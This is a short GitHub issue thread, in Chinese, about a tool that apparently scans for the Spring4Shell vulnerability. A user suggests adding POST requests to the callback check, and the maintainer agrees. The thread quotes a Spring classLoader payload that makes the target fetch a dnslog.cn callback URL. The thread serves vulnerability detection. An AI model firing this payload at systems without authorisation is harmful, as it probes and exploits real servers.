### ISSUE TITLE
建议

### ISSUE THREAD

**Issue by silentsilent** [metaStor/SpringScan#3]
关于回连检测建议增加post检测
class.module.classLoader.resources.context.configFile=http://88.zusqre.dnslog.cn/37fy&class.module.classLoader.resources.context.configFile.content.oq=nj

我在我的测试环境中发现get无法获取获取dnslog，换成post可以检测到

**Comment by metaStor** [comment]
感谢建议，已增加POST请求（GET不成功的情况下自动改为POST请求尝试）

![image](https://user-images.githubusercontent.com/43668218/162668883-6620ded3-6dbf-4b6a-92b4-ab44cd9dbe80.png)
